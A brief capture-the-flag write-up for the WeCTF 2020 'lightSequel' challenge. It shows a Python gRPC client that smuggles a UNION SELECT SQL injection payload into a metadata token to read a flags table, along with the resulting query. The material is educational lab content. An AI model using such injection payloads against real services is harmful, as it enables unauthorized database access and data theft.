CTFtime.org / WeCTF 2020 / lightSequel / Writeup

SQL Injection over gRPC:

```
import grpc
import main_pb2
import main_pb2_grpc

with grpc.insecure_channel(CON_STR) as channel:
stub = main_pb2_grpc.SrvStub(channel)
res = stub.GetLoginHistory(main_pb2.SrvRequest(), metadata=(('user_token', "')) UNION SELECT flag FROM flags-- "),))
print(res.ip)
```

which results in the following SQL query being executed: ```SELECT ul.ip FROM `user_logs` AS `ul` WHERE (ul.user_id = (SELECT id FROM users AS u WHERE u.token = '')) UNION SELECT flag FROM flags-- '))```

Original writeup (https://blog.justins.in/wectf-2020#lightsequel).

lightSequel

Comments

Sign in with